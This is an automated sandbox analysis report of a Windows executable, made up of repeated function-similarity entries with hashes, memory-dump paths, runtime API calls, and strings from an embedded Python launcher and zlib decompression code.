                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                              • Instruction ID: c87750b423259ca73a37448cb9e3486c1050400a723d4ed49d439a6e0e6ad29a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AD41B63291824587FB34EB39A540379F7A1EB65750F900172E68E836D9CF3DE402CBA2
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _fread_nolock
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 840049012-0
                                                                                                                                                                                                                              • Opcode ID: 7b0bfe6dda5be6348f5dea9afb2976fe88cae53a5ed3d6ba0ce225c2e8636390
                                                                                                                                                                                                                              • Instruction ID: 5eac34d143a98ddc1e11c8133e3d16fa8cc1d241fbf1b774b58bcddbc53cc607
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7b0bfe6dda5be6348f5dea9afb2976fe88cae53a5ed3d6ba0ce225c2e8636390
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 33217121B1865146FA50FA2269443FAE752FF45BD8FC844B2EE4D0778ACEBDE051C712
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
                                                                                                                                                                                                                              • Instruction ID: ed6467542f1b89133117b0ef7db505fafeb9c32d2d00e86df438a2cb0da09135
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 96317E72A1860285F711FB75884137DA7A0EFA0BA0FC101B7E91D033DADE7CA5428732
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3947729631-0
                                                                                                                                                                                                                              • Opcode ID: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
                                                                                                                                                                                                                              • Instruction ID: c9e9575e22fe9a05d56e96a0748133f05442c53471008ec5b0c8fa685a81f891
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B216872A046858AFB24EF74C4803EC73B0EB14718F845677E76D06A99EF389584CB62
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                              • Instruction ID: e302266983d598e0663e992107c0094a23fbe487e1e9b27af0ad8e5690f3ba44
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 21116F65A1C64281FA61FF6194007B9E360EFA5B84FC444B3EA4C57A9ECF3CD4018762
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
• Instruction ID: 870eb6fc6106efc71abb7fd260fe0838bba690b09f9ed7633e88a6430e8dadb6
• Instruction Fuzzy Hash: 1D21A132608B8186EB61EF28D440379B7A0FB84B54F9842B5EA5D876DDDF3CD401CB21
APIs
Memory Dump Source
• Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
• Instruction ID: 255d7391021efd3bdff95e3844f6d7295641bbccf7e78d129de294dd346b75f7
• Instruction Fuzzy Hash: 8D018261B0874940F504FB6299402A9E795FFA5FE0F894672DE5C17BDECE3CE4018311
APIs
• HeapAlloc.KERNEL32(?,?,00000000,00007FF7EAD1B32A,?,?,?,00007FF7EAD14F11,?,?,?,?,00007FF7EAD1A48A), ref: 00007FF7EAD1EBED
Similarity
• API ID: AllocHeap
• String ID:
• API String ID: 4292702814-0
• Opcode ID: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
• Instruction ID: 073d31d3aa8517958e1066c480c02c0a709202f1d6a1eed3c9e79572b0961b62
• Instruction Fuzzy Hash: C5F06254B0920241FE59F67559993B5D399DFA8B40FCC45B2C90F463C9DD3CE4818232
APIs
• HeapAlloc.KERNEL32(?,?,?,00007FF7EAD10C90,?,?,?,00007FF7EAD122FA,?,?,?,?,?,00007FF7EAD13AE9), ref: 00007FF7EAD1D63A
Similarity
• API ID: AllocHeap
• String ID:
• API String ID: 4292702814-0
• Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
• Instruction ID: 4e75942390d74251708174c86bbe5854b8d2a36d7cea8b24552fb5be8cf2454a
• Instruction Fuzzy Hash: 5AF0D450B0924A45FE65B7B158417759394DFA4BA0FC806B2D9BE862CADF3CA4808672
APIs
• GetProcAddress.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD05840
• GetLastError.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD05852
• GetProcAddress.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD05889
• GetLastError.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD0589B
• GetProcAddress.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD058B4
• GetLastError.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD058C6
• GetProcAddress.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD058DF
• GetLastError.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD058F1
• GetProcAddress.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD0590D
• GetLastError.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD0591F
• GetProcAddress.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD0593B
• GetLastError.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD0594D
• GetProcAddress.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD05969
• GetLastError.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD0597B
• GetProcAddress.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD05997
• GetLastError.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD059A9
• GetProcAddress.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD059C5
• GetLastError.KERNEL32(?,00007FF7EAD064CF,?,00007FF7EAD0336E), ref: 00007FF7EAD059D7
Strings
Similarity
• API ID: AddressErrorLastProc
• String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
• API String ID: 199729137-653951865
• Opcode ID: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
• Instruction ID: 838a6403920f793cf825e78015ef6722e1d388e4f4ef0c52e758ecde8d02b0c6
• Instruction Fuzzy Hash: FE22D274A09B0781FA05FB11A8507B4A7A5EF05749FD490F7E81E02268FFBCB948C272
APIs
Strings
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                                                                                                                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                              • API String ID: 808467561-2761157908
                                                                                                                                                                                                                              • Opcode ID: 7da0388417e7c773b0aab48e07e342724827a26e5879d16e5decf6c79e081c8c
                                                                                                                                                                                                                              • Instruction ID: 31f22b5283e2208df0158dfad9c53f70904a26db70fb98b4acc606cffb1b8dde
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7da0388417e7c773b0aab48e07e342724827a26e5879d16e5decf6c79e081c8c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 16B2E6B2E182928BF766DE64D4407FDB7A1FB54348F805176DE0E57A8CDB38A900CB61
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                                                                                                                                                                                              • API String ID: 0-2665694366
                                                                                                                                                                                                                              • Opcode ID: 55880860ec2df9374ed9e05eb7c1f9660e2769407a38999da05ffb99d6c3dc89
                                                                                                                                                                                                                              • Instruction ID: b3b414dd2fe38da3b937b09c1e45a012cba9e48af51e278f459f28b11157d669
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 55880860ec2df9374ed9e05eb7c1f9660e2769407a38999da05ffb99d6c3dc89
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D3522872A186A54BE7A4DF14D498BBE7BEAFB44344F81413AE64A877C4DB3CD804CB11
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3140674995-0
                                                                                                                                                                                                                              • Opcode ID: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                              • Instruction ID: 7690faec4d4eb51db33b0a18cf866503fa47c1b85a6e53cf763e3c4af380cf83
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4E311072608B818AEB60DF60E8803ED7365FB94748F44407BDA4D47B98DF78D548C721
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF7EAD25C45
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD25598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7EAD255AC
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD1A948: RtlFreeHeap.NTDLL(?,?,?,00007FF7EAD22D22,?,?,?,00007FF7EAD22D5F,?,?,00000000,00007FF7EAD23225,?,?,?,00007FF7EAD23157), ref: 00007FF7EAD1A95E
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD1A948: GetLastError.KERNEL32(?,?,?,00007FF7EAD22D22,?,?,?,00007FF7EAD22D5F,?,?,00000000,00007FF7EAD23225,?,?,?,00007FF7EAD23157), ref: 00007FF7EAD1A968
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD1A900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7EAD1A8DF,?,?,?,?,?,00007FF7EAD1A7CA), ref: 00007FF7EAD1A909
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD1A900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7EAD1A8DF,?,?,?,?,?,00007FF7EAD1A7CA), ref: 00007FF7EAD1A92E
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF7EAD25C34
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD255F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7EAD2560C
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF7EAD25EAA
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF7EAD25EBB
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF7EAD25ECC
                                                                                                                                                                                                                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7EAD2610C), ref: 00007FF7EAD25EF3
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4070488512-0
                                                                                                                                                                                                                              • Opcode ID: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
                                                                                                                                                                                                                              • Instruction ID: feef039ee7deb00c37f8ee75818b46884c4f7fb5df07af97e66af3a7906f4d7b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F8D1AE26A0824246F720FF25D881BB9A761EF94794FC481B7EA0D47699EE3CE441C772
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1239891234-0
                                                                                                                                                                                                                              • Opcode ID: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                              • Instruction ID: 0de5e91adda5b643549efd4550c29c5ef072a380bc9a6c5675796fb433ce32cf
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1A318236608F8185EB20DF24E8403AEB3A4FB94758F900136EA9D43B69DF3CD145CB11
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2227656907-0
APIs
• _get_daylight.LIBCMT ref: 00007FF7EAD25EAA
  • Part of subcall function 00007FF7EAD255F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7EAD2560C
• _get_daylight.LIBCMT ref: 00007FF7EAD25EBB
  • Part of subcall function 00007FF7EAD25598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7EAD255AC
• _get_daylight.LIBCMT ref: 00007FF7EAD25ECC
  • Part of subcall function 00007FF7EAD255C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7EAD255DC
  • Part of subcall function 00007FF7EAD1A948: RtlFreeHeap.NTDLL(?,?,?,00007FF7EAD22D22,?,?,?,00007FF7EAD22D5F,?,?,00000000,00007FF7EAD23225,?,?,?,00007FF7EAD23157), ref: 00007FF7EAD1A95E
  • Part of subcall function 00007FF7EAD1A948: GetLastError.KERNEL32(?,?,?,00007FF7EAD22D22,?,?,?,00007FF7EAD22D5F,?,?,00000000,00007FF7EAD23225,?,?,?,00007FF7EAD23157), ref: 00007FF7EAD1A968
• GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7EAD2610C), ref: 00007FF7EAD25EF3
Similarity
• API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
• String ID:
• API String ID: 3458911817-0
APIs
Similarity
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 2933794660-0
APIs
Similarity
• API ID: memcpy_s
• String ID:
• API String ID: 1502251526-0
Strings
Similarity
• API ID:
• String ID: $header crc mismatch$unknown header flags set
• API String ID: 0-1127688429
APIs
Similarity
• API ID: ExceptionRaise_clrfp
• String ID:
• API String ID: 15204871-0
Strings
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: $
                                                                                                                                                                                                                              • API String ID: 0-227171996
                                                                                                                                                                                                                              • Opcode ID: e57f1980f4491aea9eb328a1e81193c2bccc9a7e68d1918bb9b7207cf9600634
